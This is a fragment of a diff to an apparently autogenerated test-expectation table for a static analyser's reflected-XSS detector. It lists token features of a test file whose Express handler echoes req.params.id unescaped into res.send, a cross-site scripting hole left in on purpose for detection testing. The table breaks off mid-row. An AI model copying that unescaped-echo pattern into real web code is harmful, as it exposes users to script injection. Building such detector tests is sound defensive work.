contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:36:5:38 | res | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:36:5:38 | res | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:36:5:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:36:5:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:36:5:38 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:36:5:38 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:7:6:35 | !isVali ... ams.id) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:7:6:35 | !isVali ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:7:6:35 | !isVali ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:7:6:35 | !isVali ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:7:6:35 | !isVali ... ams.id) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:8:6:20 | isValidUserId | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:8:6:20 | isValidUserId | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:8:6:20 | isValidUserId | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:8:6:20 | isValidUserId | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:8:6:20 | isValidUserId | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:8:6:35 | exceptional return of isValid ... ams.id) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:8:6:35 | exceptional return of isValid ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:8:6:35 | exceptional return of isValid ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:8:6:35 | exceptional return of isValid ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:8:6:35 | exceptional return of isValid ... ams.id) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:8:6:35 | isValid ... ams.id) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:8:6:35 | isValid ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:8:6:35 | isValid ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:8:6:35 | isValid ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:8:6:35 | isValid ... ams.id) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:22:6:24 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:22:6:24 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:22:6:24 | req | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:22:6:24 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:22:6:24 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:22:6:31 | req.params | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:22:6:31 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:22:6:31 | req.params | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:22:6:31 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:22:6:31 | req.params | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:26:6:31 | params | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:26:6:31 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:26:6:31 | params | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:26:6:31 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:26:6:31 | params | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:33:6:34 | id | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:33:6:34 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:33:6:34 | id | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:33:6:34 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:6:33:6:34 | id | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:7 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:7 | res | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:7 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:12 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:12 | res.send | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:12 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:46 | exceptional return of res.sen ... ams.id) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:46 | exceptional return of res.sen ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:46 | exceptional return of res.sen ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:46 | exceptional return of res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:46 | exceptional return of res.sen ... ams.id) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:46 | res.sen ... ams.id) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:46 | res.sen ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:46 | res.sen ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:46 | res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:5:8:46 | res.sen ... ams.id) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:9:8:12 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:9:8:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:9:8:12 | send | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:9:8:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:9:8:12 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:14:8:29 | "Unknown user: " | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:14:8:29 | "Unknown user: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:14:8:29 | "Unknown user: " | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:14:8:29 | "Unknown user: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:14:8:29 | "Unknown user: " | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:14:8:29 | "Unknown user: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -19572,6 +131984,152 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:35 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:35 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:35 | req | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:35 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:35 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:42 | req.params | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:42 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:42 | req.params | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:42 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:42 | req.params | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:45 | req.params.id | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:45 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:45 | req.params.id | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:45 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:45 | req.params.id | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:33:8:45 | req.params.id | stringConcatenatedWith | 'Unknown user: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:37:8:42 | params | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:37:8:42 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:37:8:42 | params | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:37:8:42 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:37:8:42 | params | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:44:8:45 | id | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:44:8:45 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:44:8:45 | id | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:44:8:45 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:8:44:8:45 | id | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:5:9:16 | moreBadStuff | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:5:9:16 | moreBadStuff | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:5:9:16 | moreBadStuff | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:5:9:16 | moreBadStuff | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:5:9:16 | moreBadStuff | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:5:9:33 | exceptional return of moreBad ... s, res) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:5:9:33 | exceptional return of moreBad ... s, res) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:5:9:33 | exceptional return of moreBad ... s, res) | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:5:9:33 | exceptional return of moreBad ... s, res) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:5:9:33 | exceptional return of moreBad ... s, res) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:5:9:33 | moreBad ... s, res) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:5:9:33 | moreBad ... s, res) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:5:9:33 | moreBad ... s, res) | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:5:9:33 | moreBad ... s, res) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:5:9:33 | moreBad ... s, res) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:18:9:20 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:18:9:20 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:18:9:20 | req | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:18:9:20 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:18:9:20 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:18:9:27 | req.params | CalleeFlexibleAccessPath | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:18:9:27 | req.params | InputArgumentIndex | 0 | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:18:9:27 | req.params | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:18:9:27 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:18:9:27 | req.params | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:18:9:27 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:18:9:27 | req.params | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:22:9:27 | params | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:22:9:27 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:22:9:27 | params | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:22:9:27 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:22:9:27 | params | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:30:9:32 | res | CalleeFlexibleAccessPath | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:30:9:32 | res | InputArgumentIndex | 1 | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:30:9:32 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:30:9:32 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:30:9:32 | res | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:30:9:32 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:9:30:9:32 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:16:0 | this | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:16:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:16:0 | this | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:16:0 | this | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:16:0 | this | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | 'arguments' object of function moreBadStuff | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | 'arguments' object of function moreBadStuff | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | 'arguments' object of function moreBadStuff | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | 'arguments' object of function moreBadStuff | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | 'arguments' object of function moreBadStuff | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | exceptional return of function moreBadStuff | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | exceptional return of function moreBadStuff | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | exceptional return of function moreBadStuff | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | exceptional return of function moreBadStuff | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | exceptional return of function moreBadStuff | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | functio ... OT OK\\n} | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | functio ... OT OK\\n} | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | return of function moreBadStuff | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | return of function moreBadStuff | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | return of function moreBadStuff | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | return of function moreBadStuff | 